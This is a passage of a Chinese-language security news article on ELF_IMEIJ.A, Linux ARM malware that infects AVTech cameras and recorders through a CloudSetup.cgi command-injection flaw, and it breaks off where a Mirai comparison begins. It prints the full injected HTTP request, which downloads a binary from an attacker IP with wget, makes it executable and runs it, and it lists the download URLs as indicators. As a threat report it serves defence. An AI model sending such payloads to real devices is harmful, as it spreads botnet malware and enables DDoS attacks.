趋势科技：恶意软件利用Linux CGI 漏洞进行传播

Linux一直是企业平台和物联网制造商的首选操作系统，基于Linux的设备也被不断部署在许多不同行业的智能系统中，不过随着其广泛使用，我们也看到了以Linux为攻击目标的安全威胁数量正在快速上升。我们以前报告了2016年一系列的Linux威胁，其中最引人注目的是Mirai恶意软件。

最近检测到的一个针对Linux ARM的恶意软件ELF_IMEIJ.A（趋势科技检测并标记为ELF_IMEIJ.A）。ELF_IMEIJ.A利用了AVTech（一家监控技术公司）设备中的一个漏洞。该漏洞由Search-Lab（一个安全研究机构）发现并报告，并于2016年10月向AVTech披露。但是，截至目前似乎厂家还没有对这个漏洞进行修复。

ELF_IMEIJ.A和Mirai的比较

ELF_IMEIJ.A通过RFIs在cgi-bin脚本中进行传播。远程攻击者将此请求发送到随机IP地址，并尝试利用此漏洞：

POST /cgi-bin/supervisor/CloudSetup.cgi?exefile=wget -O /tmp/Arm1 http://192.154.108.2:8080/Arm1;chmod 0777 /tmp/Arm1;/tmp/Arm1; HTTP/1.1

具体来说，ELF_IMEIJ.A就是利用AVTech所报告的CGI目录漏洞CloudSetup.cgi来执行触发恶意软件下载的命令注入。攻击者欺骗设备下载恶意文件，并更改文件的权限，最终进行恶意攻击。

ELF_IMEIJ.A的攻击起始于连接AVTech的设备，如支持AVTech云的IP摄像机，CCTV设备和网络录像机。一旦这些设备感染了这个恶意软件，恶意程序就会开始收集系统信息和用户的网络活动数据。它还可以执行来自恶意actor的shell命令，启动分布式拒绝服务（DDoS）攻击并让自己进入休眠状态。更危险的是，受感染的设备还会将连接到同一网络的其他设备也感染了。

目前，趋势科技检测到总共有三个IP地址可以下载ELF_IMEIJ.A，并且这三个IP都托管在两个单独的ISP上。

hxxp://172.247.116.3:8080/Arm1
hxxp://172.247.116.21:85/Arm1
hxxp://192.154.108.2:8080/Arm1

经过分析，托管的ISP位于韩国。

根据报道，AVTech目前已有超过13万个不同的设备连接到互联网，所以ELF_IMEIJ.A的攻击可以进行大规模的攻击，更糟的是，如果ELF_IMEIJ.A把这些设备可以变成网络僵尸，那可以用于发动大规模的DDoS攻击。与大多数网络连接设备一样，它们并不是默认安全的，不可能直接监控。

ELF_IMEIJ.A所带来的DDoS攻击可能会与Mirai比较相似，但他们也有明显的区别：